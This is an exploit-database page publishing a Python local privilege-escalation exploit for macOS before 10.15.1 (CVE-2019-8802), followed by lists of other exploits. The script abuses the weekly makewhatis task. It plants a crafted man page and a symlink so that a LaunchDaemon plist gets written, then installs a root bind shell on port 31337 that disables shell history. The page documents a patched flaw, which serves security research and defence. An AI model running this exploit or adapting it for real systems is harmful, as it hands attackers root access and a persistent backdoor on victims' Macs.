Menu

Search for hundreds of thousands of exploits

"MacOS 320.whatis Script - Privilege Escalation"

Author

Exploit author

"Csaba Fitzl"

Platform

Exploit platform

macos

Release date

Exploit published date

2020-05-12

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
# Exploit Title: MacOS 320.whatis Script - Privilege Escalation
# Date: 2020-05-06
# Exploit Author: Csaba Fitzl
# Vendor Homepage: https://support.apple.com/en-us/HT210722
# Version: macOS < 10.15.1
# Tested on: macOS
# CVE : CVE-2019-8802

import sys
import os

man_file_content = """
.TH exploit 1 "August 16 2019" "Csaba Fitzl"
.SH NAME
exploit \- --> <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"><plist version="1.0"><dict><key>Label</key><string>com.sample.Load</string><key>ProgramArguments</key><array> <string>/Applications/Scripts/sample.sh</string></array><key>RunAtLoad</key><true/></dict></plist><!--
"""

sh_quick_content = """
/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal
"""

sh_reboot_content = """
python /Applications/Scripts/bind.py
"""

python_bind_content = """
#!/usr/bin/python2
import os
import pty
import socket

lport = 31337

def main():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(('', lport))
    s.listen(1)
    (rem, addr) = s.accept()
    os.dup2(rem.fileno(),0)
    os.dup2(rem.fileno(),1)
    os.dup2(rem.fileno(),2)
    os.putenv("HISTFILE",'/dev/null')
    pty.spawn("/bin/bash")
    s.close()
	
if __name__ == "__main__":
    main()
"""

def create_man_file():
	print("[i] Creating bogus man page: /usr/local/share/man/man1/<!--exploit.1")	
	f = open('/usr/local/share/man/man1/<!--exploit.1','w')
	f.write(man_file_content)
	f.close()

def create_symlink():
	print("[i] Creating symlink in /usr/local/share/man/")
	os.system('ln -s /Library/LaunchDaemons/com.sample.Load.plist /usr/local/share/man/whatis.tmp')	

def create_scripts_dir():
	print("[i] Creating /Applications/Scripts directory")
	os.system('mkdir /Applications/Scripts')

def create_quick_scripts():
	create_scripts_dir()
	print("[i] Creating script file to be called by LaunchDaemon")
	f = open('/Applications/Scripts/sample.sh','w')
	f.write(sh_quick_content)
	f.close()
	os.system('chmod +x /Applications/Scripts/sample.sh')

def create_reboot_scripts():
	create_scripts_dir()
	print("[i] Creating script file to be called by LaunchDaemon")
	f = open('/Applications/Scripts/sample.sh','w')
	f.write(sh_reboot_content)
	f.close()
	os.system('chmod +x /Applications/Scripts/sample.sh')
	print("[i] Creating python script for bind shell")
	f = open('/Applications/Scripts/bind.py','w')
	f.write(python_bind_content)
	f.close()

def rename_man_pages():
	for root, dirs, files in os.walk("/usr/local/share/man"):
		for file in files:
			if file[0] in "0123456789": #if filename begins with a number
				old_file = os.path.join(root, file)
				new_file = os.path.join(root, 'a' + file)
				os.rename(old_file, new_file) #rename with adding a prefix
				print("[i] Renaming: " + os.path.join(root, file))

def main():
	if len(sys.argv) != 2 :
		print "[-] Usage: python makewhatis_exploit.py [quick|reboot]"
		sys.exit (1)
	if sys.argv[1] == 'quick':
		create_man_file()
		create_symlink()
		create_quick_scripts()
		rename_man_pages()
		print "[+] Everything is set, run periodic tasks with:\nsudo periodic weekly\n[i] and then simulate a boot load with: \nsudo launchctl load com.sample.Load.plist"
	elif sys.argv[1] == 'reboot':
		create_man_file()
		create_symlink()
		create_reboot_scripts()
		rename_man_pages()
		print "[+] Everything is set, run periodic tasks with:\nsudo periodic weekly\n[i] reboot macOS or run `sudo launchctl load com.sample.Load.plist` and connect to your root shell via:\nnc 127.1 31337"
	else:
		print "[-] Invalid arguments"
		print "[-] Usage: python makewhatis_exploit.py [quick|reboot]"

if __name__== "__main__":
	main()
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-05-12 "MacOS 320.whatis Script - Privilege Escalation" local macos "Csaba Fitzl"
2020-04-16 "VMware Fusion - USB Arbitrator Setuid Privilege Escalation (Metasploit)" local macos Metasploit
2020-03-20 "VMware Fusion 11.5.2 - Privilege Escalation" local macos "Rich Mirch"
2020-03-17 "VMWare Fusion - Local Privilege Escalation" local macos Grimm
2019-12-18 "macOS 10.14.6 (18G87) - Kernel Use-After-Free due to Race Condition in wait_for_namespace_event()" dos macos "Google Security Research"
2019-11-22 "macOS 10.14.6 - root->kernel Privilege Escalation via update_dyld_shared_cache" local macos "Google Security Research"
2019-11-05 "macOS XNU - Missing Locking in checkdirs_callback() Enables Race with fchdir_common()" dos macos "Google Security Research"
2019-11-04 "Apple macOS 10.15.1 - Denial of Service (PoC)" dos macos 08Tc3wBB
2019-10-09 "XNU - Remote Double-Free via Data Race in IPComp Input Path" dos macos "Google Security Research"
2019-09-19 "macOS 18.7.0 Kernel - Local Privilege Escalation" local macos A2nkF
Release Date Title Type Platform Author
2020-05-12 "MacOS 320.whatis Script - Privilege Escalation" local macos "Csaba Fitzl" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected